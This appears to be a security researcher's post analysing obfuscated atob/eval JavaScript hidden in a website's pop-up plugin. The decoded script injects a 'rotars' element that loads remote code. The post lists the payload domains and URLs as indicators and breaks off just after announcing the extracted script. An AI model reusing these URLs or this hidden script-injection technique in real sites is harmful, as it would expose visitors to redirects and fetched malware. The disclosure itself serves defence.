I was recently told that a website was behaving strangely — it was reportedly redirecting users, but only once. After that initial redirect, the behavior would stop or change, which immediately raised some questions about what was happening behind the scenes.
I found the obfuscated Javascript snippet in a custom JS section in a pop up plugin using atob eval techniques. i tried to make it clear with the help of CyberChef, and since i am not used to obfuscate code, maybe the recipes are not the cleanest.
data available when requested
It turned out to be dynamically creating a new script element and loading an external JavaScript file from a remote domain. This means the actual behavior of the site isn’t fully contained in the page itself — it depends on code being fetched and executed from an external source.
the 3 code snippets create the element with the same id “rotars”. 2 of the snippets try to load the script from the same domain “near.flyspecialline.com” with name “eGRHSERSW” and the other snippet from “call.colorschemeas.com” with the name “nsYzjY18” and both report 404 for now and i suspect a burn after serve logic, but it remains to be investigated more when i have more time.
More updates will follow as I trace the connected domains and try to understand how widely this script is being used.
Domains:
- flyspecialline.com
- near.flyspecialline.com
- colorschemeas.com
- call.colorschemeas.com
URL:
- https://near.flyspecialline.com/eGRHSERSW
- https://call.colorschemeas.com/nsYzjY18
Script ID:
- rotars
Techniques:
- obfuscated JavaScript
- atob decoding
- dynamic script injectionUpdate 1
i was able to get the remote jS script
Disclaimer: The following script was extracted during analysis of a suspicious JavaScript redirect and fingerprinting chain. It is shared for educational and security research purposes only.
